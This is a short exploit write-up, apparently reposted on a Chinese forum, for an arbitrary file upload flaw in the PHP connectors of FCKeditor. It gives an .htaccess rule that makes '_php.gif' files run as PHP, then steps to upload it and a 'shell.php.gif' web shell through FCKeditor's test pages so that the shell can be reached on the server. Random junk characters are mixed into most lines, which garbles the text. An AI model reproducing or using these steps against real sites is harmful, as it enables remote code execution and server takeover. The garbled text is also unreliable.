FCKeditor所有php版本Upload上传漏洞
9 e- w5 ^3 z3 Q5 ]- ~作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07$ ?# M9 j& c- b- f: k
减小字体 增大字体! N: K& o* D+ T3 z
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability1 u- H& s. d$ [4 {3 Z% ]; s5 n
[+] Date: 2011$ Y: p; x% v3 |" s w+ [% P
[+] Author : sinesafe.cn
7 ^2 h, @5 ?+ W6 `/ e! D2 \[+] Website : WwW.sinesafe.cn; @* ]$ S# W$ T ]
———————————————————
& |7 ^' A1 O1 U& ?* y5 A) C, p: T: n# }1.create a htaccess file:9 H7 ~4 ~7 v7 S+ w4 C
code:
! Y4 J# b2 G+ }% [1 |( a3 ^<FilesMatch “_php.gif”>( B5 e+ F6 o; m5 m+ B: z
SetHandler application/x-httpd-php! r! m$ C9 H2 Z! m9 F( p- o, ]. O
</FilesMatch>
0 _' b/ a o* \" {) L: z
5 p1 f9 w! L( H( d* w5 ]2.Now upload this htaccess with FCKeditor.: c+ ?% G) `3 x2 o4 V
9 W2 x1 e( o) v- C3 Ohttp://www.sinesafe.cn/FCKeditor ... er/upload/test.html
4 d# U$ y5 @$ G: \+ p. C
0 X- S) e3 k* T1 A& shttp://www.sinesafe.cn/FCKeditor ... onnectors/test.html7 ?- e7 ^% P- _$ r
# l# C* R" S7 i6 }; \5 r' Z———————————————————————————————-
( ~: C* x; E6 N$ `( S; u. z3.Now upload shell.php.gif with FCKeditor.
# R6 P" Z2 P0 @0 A' ~6 O7 g4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.
1 q9 x. v& {# Y" q7 B8 J5.http://www.sinesafe.cn/anything/shell_php.gif& }! Q2 N5 v1 L+ W* k) e
6.Now shell is available from server. |
% H9 ^) D: ~; @8 z- F% f
& L* v- n+ u" E5 P, `, T
6 l$ `4 o6 u, e" ?/ o5 m: L" Z4 v/ ~" I |
发表于 2013-10-27 17:25:21
收藏
支持
反对